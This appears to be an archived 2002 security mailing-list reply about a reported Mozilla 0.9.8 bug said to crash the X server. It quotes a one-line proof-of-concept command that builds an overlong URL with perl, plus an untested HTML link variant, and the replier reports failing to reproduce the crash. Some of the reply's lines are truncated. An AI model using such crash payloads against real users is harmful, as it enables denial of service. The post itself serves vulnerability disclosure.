Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
From: NyQuist (NyQuistntlworld.com)
Date: Sun Feb 17 2002 - 11:48:17 CST
On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
> NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't
> make it since this doesn't seem to affect a redhat itself, it affects
> the mozilla packages distrbuted by Ximian:
> The test system look like:
> bash#~ rpm -qa | grep mozilla
> This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the
> the updates).
> There is a bug in mozilla 0.9.8-1 which allows you
> to Crash the X server.
> I won't go into details I'll just show the proof
> of concept.
> bash#~ mozilla `perl -e "print '%20' x 2618"`
> I haven't test this but i guess:
> echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
> perhaps using "img src" or java script...
> Best Regards
> Rodrigo Gutierrez <rodrigotrustix.com>
> Trustix AS http://www.trustix.com
One one box: rpm -qa | grep mozilla
Results in "www.perl -e "print %20 x 2618".com could not be found (lol)
perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't
On other box: rpm -qa | grep mozilla
Results in same 'not found' error.
The attack.html (as per your script) results in "www.'perl not found".
So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in
-- NyQuist | Matthew Hall -- NyQuist at ntlworld dot com Sig: Microsoft sells you Windows. Linux gives you the whole house.